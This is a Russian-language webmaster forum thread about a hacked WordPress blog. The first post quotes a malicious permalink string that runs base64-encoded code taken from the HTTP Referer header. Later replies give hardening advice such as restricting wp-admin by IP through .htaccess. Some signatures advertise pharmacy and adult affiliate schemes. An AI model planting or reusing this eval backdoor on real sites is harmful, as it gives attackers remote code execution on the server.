|
|
adamant V.I.P. |
Зарегистрирован: 20.03.2008
Сообщений: 11494
|
Обратиться по нику
|
adamant |
Ответить с цитатой | | |
|
Сегодня вижу вот такю строчечку в ВП в ЧПУ
Код: |
%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/
|
вот [url=http://www.google.com/search?client=opera&rls=ru&q=%22eval(base64_decode($_SERVER%5BHTTP_REFERER%5D%22&sourceid=opera&ie=utf-8&oe=utf-8]так говорит гугль[/url]
http://www.google.com/search?client=opera&rls=ru&q=%22eval(base64_decode($_SERVER%5BHTTP_REFERER%5D%22&sourceid=opera&ie=utf-8&oe=utf-8
ну и тута пишет Влад |
|
|
|
|
|
EvaPharmacy. Чтобы мазать хлеб икоркой, Ева – лучшая партнёрка! Инвайты Jabber: evasupport@jabber.org и ICQ: 750000
Unlimited on 1Gbs port | |
IseeDeadPeople Объединенная Электрическая |
Зарегистрирован: 06.12.2005
Сообщений: 21240
|
Обратиться по нику
|
IseeDeadPeople |
Ответить с цитатой | | |
|
а где бы почитать полное тех. описание бага? .. и заплатки взять?
у меня только один ресурс на старой версии ВП, необновлял его ниразу, как узнать подвержен ли он опасности..
вообщем, больше конкретики.. |
|
|
|
|
|
LIVE SEX |
Rabbit Кролики - это не только ценный мех |
Зарегистрирован: 01.08.2005
Сообщений: 19787
|
Обратиться по нику
|
Rabbit |
Ответить с цитатой | | |
|
Цитата: |
на старой версии ВП, необновлял его ниразу, как узнать подвержен ли он опасности..
|
Подвержен, 250%. Обновись и побыстрее. |
|
|
|
|
|
Новое. Прибыльное. Скоро!
|
Sterx + Опытный |
Зарегистрирован: 08.10.2007
Сообщений: 252
|
Обратиться по нику
|
Sterx + |
Ответить с цитатой | | |
|
куй его знает, с тех пор как закрыл админки htaccess меня не ломали вот уже с год-полтора точно
некоторые блоги wp 2.3.1 стоят |
|
|
|
|
|
аккаунты адалт партнерок за 50% |
shhef + V.I.P. |
Зарегистрирован: 14.09.2007
Сообщений: 7694
|
Обратиться по нику
|
shhef + |
Ответить с цитатой | | |
|
каникулы закончились, студентам же надо чем то заняться да и коню понятно, что ВП ломают даже школьники... |
|
|
|
|
|
Облачный сервер за 5 у.е. + 10 у.е на счет при регистрации по моей ссылке. Разные страны! Лучший треккер! |
DK + wordpress |
Зарегистрирован: 18.06.2008
Сообщений: 2425
|
Обратиться по нику
|
|
|
|
m_Stasuk Дизайнер |
Зарегистрирован: 23.12.2007
Сообщений: 5967
|
Обратиться по нику
|
|
|
Зарабатываю на рускамзе
Ростов-на-Дону
|
Sterx + Опытный |
Зарегистрирован: 08.10.2007
Сообщений: 252
|
Обратиться по нику
|
|
|
аккаунты адалт партнерок за 50% |
Dark Elf + V.I.P. |
Зарегистрирован: 23.12.2007
Сообщений: 1545
|
Обратиться по нику
|
Dark Elf + |
Ответить с цитатой | | |
|
Этот баг подробно описан в августовском номере любимого школьниками журнала "Х". Собственно, это и не баг даже, а возможные действия злодея, после того, как ВП уже сломан и получен доступ к админке. Способы борьбы стандартные
1. Не будем делать юзернейм админа дефолтным (admin или administrator) - эксплойты, которыми пользуются злохакеры в основном ищут именно такого юзера. Чтобы еще больше сбить с толку, можно создать юзера admin с привилегиями простого читателя.
2. Изменить права доступа на все каталоги и все файлы на 644 или даже 444, кроме папки, куда грузятся картинки (777). При этом из админки будет невозможно редактировать темы и менять структуру пермалинков, но ведь и нужно это обычно бывает только один раз при первоначальной установке. Да и при необходимости можно на время поменять обратно.
3. Создать пустой файл index.html в папке plugins
4. Дополнительно можно закрыть админку средствами Апача, поставив пароль на /wp-admin/ через cPannel
5. Если всегда входите в админку с одного IP, допишите в .htaccess в папке /wp-admin/ (если его там нет, то создайте) следующее
order deny,allow
deny from all
allow from 123.456.789.123
Здесь 123.456.789.123 - твой ИП
Подробнее (правда про немного другой баг, но суть та же)
http://darkelfblog.info/?p=34 |
|
|
|
|
|
Мой старый блог про адалт-блоги
Тёмные — это те, кто хочет свободы и независимости, не стремятся к власти, не навязывают своих глупых желаний окружающим. |
sydoow V.I.P. |
Зарегистрирован: 29.06.2007
Сообщений: 8213
|
Обратиться по нику
|
sydoow |
Ответить с цитатой | | |
|
Опять в "Хакере" темы палят))) помню как тодавно я прочитал там статьлю про адалт и заинтересовался им))) |
|
|
|
|
|
|
adamant V.I.P. |
Зарегистрирован: 20.03.2008
Сообщений: 11494
|
Обратиться по нику
|
adamant |
Ответить с цитатой | | |
|
[offtop]аха.. а темерь пришла другая волна ))) ::::: как поиметь халявных ссылок с ломаных вордпресов, ну или трафика..[/offtop] |
|
|
|
|
|
EvaPharmacy. Чтобы мазать хлеб икоркой, Ева – лучшая партнёрка! Инвайты Jabber: evasupport@jabber.org и ICQ: 750000
Unlimited on 1Gbs port | |
Ffadu aka Udaff |
Зарегистрирован: 04.06.2008
Сообщений: 3315
|
Обратиться по нику
|
|
|
VR PORN - ратио, как в 90-х |
wlad2 Свой |
Зарегистрирован: 20.03.2009
Сообщений: 16
|
Обратиться по нику
|
wlad2 |
Ответить с цитатой | | |
|
хорошо что базу не удолили, теперь поставил плагин авто бэкапа на мыло.. |
|
|
|
|
|
Вордпрессовский seo блог wlad2.ru |
|